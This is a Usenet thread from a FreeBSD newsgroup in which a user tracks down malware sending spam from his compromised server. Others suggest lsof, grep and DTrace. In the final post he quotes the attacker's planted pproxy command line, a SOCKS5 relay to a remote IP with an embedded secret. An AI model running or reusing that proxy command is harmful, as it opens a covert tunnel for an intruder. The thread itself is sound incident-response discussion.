Rocksolid Light

Welcome to RetroBBS

mail  files  register  newsreader  groups  login

Message-ID:  

I have hardly ever known a mathematician who was capable of reasoning. -- Plato

devel / comp.unix.bsd.freebsd.misc / Re: locating malware

SubjectAuthor
* locating malwareMike Scott
+- Re: locating malwareJohn D Groenveld
+* Re: locating malwareMatthias Meyser
|`* Re: locating malwareMike Scott
| `- Re: locating malwareMike Scott
`- Re: locating malwareGerhard Strangar

1
locating malware

<su3f50$tts$1@dont-email.me>

  copy mid

https://www.rocksolidbbs.com/devel/article-flat.php?id=155&group=comp.unix.bsd.freebsd.misc#155

  copy link   Newsgroups: comp.unix.bsd.freebsd.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader02.eternal-september.org!.POSTED!not-for-mail
From: usenet.16@scottsonline.org.uk.invalid (Mike Scott)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: locating malware
Date: Thu, 10 Feb 2022 16:39:59 +0000
Organization: Scott family
Lines: 23
Message-ID: <su3f50$tts$1@dont-email.me>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Injection-Date: Thu, 10 Feb 2022 16:40:00 -0000 (UTC)
Injection-Info: reader02.eternal-september.org; posting-host="f523f2f92c3970bd9c6adb7e5bb3c058";
logging-data="30652"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1/DPhyW6fs/f50+kBnU6b8xzWecT+zYCsI="
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Thunderbird/91.5.0
Cancel-Lock: sha1:Ml+Q0Rm89SqYHhHdyBkd/s/TxsY=
Content-Language: en-GB
 by: Mike Scott - Thu, 10 Feb 2022 16:39 UTC

Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
has been sending, and fortunately failing, to send junk mail to an MS
machine, possibly a hotmail destination (certainly MS network). It's
firewalled in now, but it was sending

EHLO localhost
MAIL FROM:<info@newretail.live>

and then closing the connection.

A full clamav scan is currently running but will take quite a few hours.

So, given an unknown program that is occasionally trying to make an
outbound link, can anyone suggest please how to find it?

Thanks.

--
Mike Scott
Harlow, England

Re: locating malware

<f7eNJ.41594$%uX7.39403@fx38.iad>

  copy mid

https://www.rocksolidbbs.com/devel/article-flat.php?id=156&group=comp.unix.bsd.freebsd.misc#156

  copy link   Newsgroups: comp.unix.bsd.freebsd.misc
Path: i2pn2.org!i2pn.org!weretis.net!feeder8.news.weretis.net!feeder1-2.proxad.net!proxad.net!feeder1-1.proxad.net!193.141.40.65.MISMATCH!npeer.as286.net!npeer-ng0.as286.net!peer01.ams1!peer.ams1.xlned.com!news.xlned.com!peer03.iad!feed-me.highwinds-media.com!news.highwinds-media.com!fx38.iad.POSTED!not-for-mail
From: groenveld@acm.org (John D Groenveld)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: Re: locating malware
References: <su3f50$tts$1@dont-email.me>
Organization: Groenveld.US
Lines: 11
Message-ID: <f7eNJ.41594$%uX7.39403@fx38.iad>
X-Complaints-To: abuse@frugalusenet.com
NNTP-Posting-Date: Thu, 10 Feb 2022 19:58:03 UTC
Date: Thu, 10 Feb 2022 19:58:03 GMT
X-Received-Bytes: 929
 by: John D Groenveld - Thu, 10 Feb 2022 19:58 UTC

In article <su3f50$tts$1@dont-email.me>,
Mike Scott <usenet.16@scottsonline.org.uk.invalid> wrote:
>So, given an unknown program that is occasionally trying to make an
>outbound link, can anyone suggest please how to find it?

Assuming you trust the host, Bad Idea[tm], you can run lsof on it:
<URL:https://people.freebsd.org/~abe/>
<URL:https://www.freshports.org/sysutils/lsof/>

John
groenveld@acm.org

Re: locating malware

<su3v7v$297n$1@nntp.serx01.xenet.de>

  copy mid

https://www.rocksolidbbs.com/devel/article-flat.php?id=157&group=comp.unix.bsd.freebsd.misc#157

  copy link   Newsgroups: comp.unix.bsd.freebsd.misc
Path: i2pn2.org!i2pn.org!aioe.org!nntp.xenet.de!.POSTED.tubercel.gate.xenet.de!not-for-mail
From: matthias@harz.de (Matthias Meyser)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: Re: locating malware
Date: Thu, 10 Feb 2022 22:14:28 +0100
Organization: XeNET GmbH, 38678 Clausthal-Zellerfeld
Message-ID: <su3v7v$297n$1@nntp.serx01.xenet.de>
References: <su3f50$tts$1@dont-email.me>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: quoted-printable
Injection-Date: Thu, 10 Feb 2022 21:14:39 -0000 (UTC)
Injection-Info: nntp.serx01.xenet.de; posting-host="tubercel.gate.xenet.de:213.221.94.37";
logging-data="74999"; mail-complaints-to="usenet@nntp.xenet.de"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101
Thunderbird/91.5.1
Content-Language: de-DE
In-Reply-To: <su3f50$tts$1@dont-email.me>
X-Antivirus: Avast (VPS 220210-0, 10.2.2022), Outbound message
X-Antivirus-Status: Clean
 by: Matthias Meyser - Thu, 10 Feb 2022 21:14 UTC

Am 10.02.2022 um 17:39 schrieb Mike Scott:
> Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
> has been sending, and fortunately failing, to send junk mail to an MS
> machine, possibly a hotmail destination (certainly MS network). It's
> firewalled in now, but it was sending
>
> EHLO localhost
> MAIL FROM:<info@newretail.live>

fgrep -Ri newretail.live /

--
Diese E-Mail wurde von Avast Antivirus-Software auf Viren geprüft.
https://www.avast.com/antivirus

Re: locating malware

<j6mb41Fb568U1@mid.individual.net>

  copy mid

https://www.rocksolidbbs.com/devel/article-flat.php?id=158&group=comp.unix.bsd.freebsd.misc#158

  copy link   Newsgroups: comp.unix.bsd.freebsd.misc
Path: i2pn2.org!i2pn.org!news.swapon.de!fu-berlin.de!uni-berlin.de!individual.net!not-for-mail
From: g.s@arcor.de (Gerhard Strangar)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: Re: locating malware
Date: Fri, 11 Feb 2022 06:39:12 +0100
Lines: 8
Message-ID: <j6mb41Fb568U1@mid.individual.net>
References: <su3f50$tts$1@dont-email.me>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
X-Trace: individual.net b6AHfiNcEIMBmH+7PSIIxwjExGBwBUUJNjB72TG9XVAatY9NUm
Cancel-Lock: sha1:S6yg22LMsV5rMBAb1aCElbR5wrU=
X-No-Archive: Yes
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:68.0) Gecko/20100101
Firefox/68.0 SeaMonkey/2.53.10.2
In-Reply-To: <su3f50$tts$1@dont-email.me>
 by: Gerhard Strangar - Fri, 11 Feb 2022 05:39 UTC

Mike Scott wrote:

> So, given an unknown program that is occasionally trying to make an
> outbound link, can anyone suggest please how to find it?

Not sure if this works on 11.4:
kldload dtraceall
dtrace -n 'syscall:freebsd:connect:entry {trace(execname)}'

Re: locating malware

<suj3d2$p8d$1@dont-email.me>

  copy mid

https://www.rocksolidbbs.com/devel/article-flat.php?id=159&group=comp.unix.bsd.freebsd.misc#159

  copy link   Newsgroups: comp.unix.bsd.freebsd.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader02.eternal-september.org!.POSTED!not-for-mail
From: usenet.16@scottsonline.org.uk.invalid (Mike Scott)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: Re: locating malware
Date: Wed, 16 Feb 2022 14:57:38 +0000
Organization: Scott family
Lines: 27
Message-ID: <suj3d2$p8d$1@dont-email.me>
References: <su3f50$tts$1@dont-email.me> <su3v7v$297n$1@nntp.serx01.xenet.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Injection-Date: Wed, 16 Feb 2022 14:57:39 -0000 (UTC)
Injection-Info: reader02.eternal-september.org; posting-host="955fe17187b4e35ebd6277fe21a6d596";
logging-data="25869"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX19gN1bduSgAYVHj++91Rn1dN7lvb6aZ/xs="
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Thunderbird/91.5.0
Cancel-Lock: sha1:P6kvbKI+/Xv/x5jUAcP+pfMZFLk=
In-Reply-To: <su3v7v$297n$1@nntp.serx01.xenet.de>
Content-Language: en-GB
 by: Mike Scott - Wed, 16 Feb 2022 14:57 UTC

On 10/02/2022 21:14, Matthias Meyser wrote:
> Am 10.02.2022 um 17:39 schrieb Mike Scott:
>> Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
>> has been sending, and fortunately failing, to send junk mail to an MS
>> machine, possibly a hotmail destination (certainly MS network). It's
>> firewalled in now, but it was sending
>>
>> EHLO localhost
>> MAIL FROM:<info@newretail.live>
>
> fgrep -Ri newretail.live  /
>
>
>
Thanks to all for the comments.

Unfortunately (perhaps?) there haven't been any outbound attempts
lately, which makes me very uncomfortable. I'm running this one: brute
force, and assumes there's no encryption involved.

But hopefully I'll soon have the system ported to a new and smaller box,
this time using jails for outward-facing services. (An enterprise that's
proven much harder than anticipated!)

--
Mike Scott
Harlow, England

Re: locating malware

<sulnk1$vcb$1@dont-email.me>

  copy mid

https://www.rocksolidbbs.com/devel/article-flat.php?id=162&group=comp.unix.bsd.freebsd.misc#162

  copy link   Newsgroups: comp.unix.bsd.freebsd.misc
Path: i2pn2.org!i2pn.org!eternal-september.org!reader02.eternal-september.org!.POSTED!not-for-mail
From: usenet.16@scottsonline.org.uk.invalid (Mike Scott)
Newsgroups: comp.unix.bsd.freebsd.misc
Subject: Re: locating malware
Date: Thu, 17 Feb 2022 14:54:56 +0000
Organization: Scott family
Lines: 48
Message-ID: <sulnk1$vcb$1@dont-email.me>
References: <su3f50$tts$1@dont-email.me> <su3v7v$297n$1@nntp.serx01.xenet.de>
<suj3d2$p8d$1@dont-email.me>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Injection-Date: Thu, 17 Feb 2022 14:54:57 -0000 (UTC)
Injection-Info: reader02.eternal-september.org; posting-host="394393715db69b6b4014e9d33f3c83fa";
logging-data="32139"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX1/Zrzlew+WMlzvPjCCqDR/WZ19bR+uzb7g="
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Thunderbird/91.5.0
Cancel-Lock: sha1:mmV2xRd4cd3b07GmRLf4SsxEtko=
In-Reply-To: <suj3d2$p8d$1@dont-email.me>
Content-Language: en-GB
 by: Mike Scott - Thu, 17 Feb 2022 14:54 UTC

On 16/02/2022 14:57, Mike Scott wrote:
.....

After an absence of a few days, similar behaviour is back. Same
destination IP, but zero-length packets with bad checksum:

root@data:/var/tmp # script z tcpdump -nvvv -i pflog0 port 25 and src
192.168.0.1
Script started, output file is z
tcpdump: listening on pflog0, link-type PFLOG (OpenBSD pflog file),
capture size 262144 bytes

13:49:15.894711 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto
TCP (6), length 60)
192.168.0.1.16375 > 104.47.70.33.25: Flags [S], cksum 0x6f28
(incorrect -> 0x69dc), seq 2905393045, win 65535, options [mss
1460,nop,wscale 6,sackOK,TS val 799509169 ecr 0], length 0

However, after shutting down the webserver, I found a couple of
processes still running as www, one of which was

../python -m pproxy -l
socks5+in://116.203.212.184:10246/@192.168.0.1,#pproxy:CKjBrJD3 (python3.6)

and which seemed top be in a loop checking the remote end,
static.184.212.203.116.clients.your-server.de.

It looks as though the recent apache path bug opened up my server, and
this was left around. Looks like a proxy mechanism, that's about to be
kill -9'ed.

Thanks all.

Oh, BTW, it's unfortunate that 11.4 froze with the package repository
stuck on the buggy version (path backtrack) of apache. I'd have hoped
someone would put in just the one bug-fix update.

--
Mike Scott
Harlow, England

1
server_pubkey.txt

rocksolid light 0.9.8
clearnet tor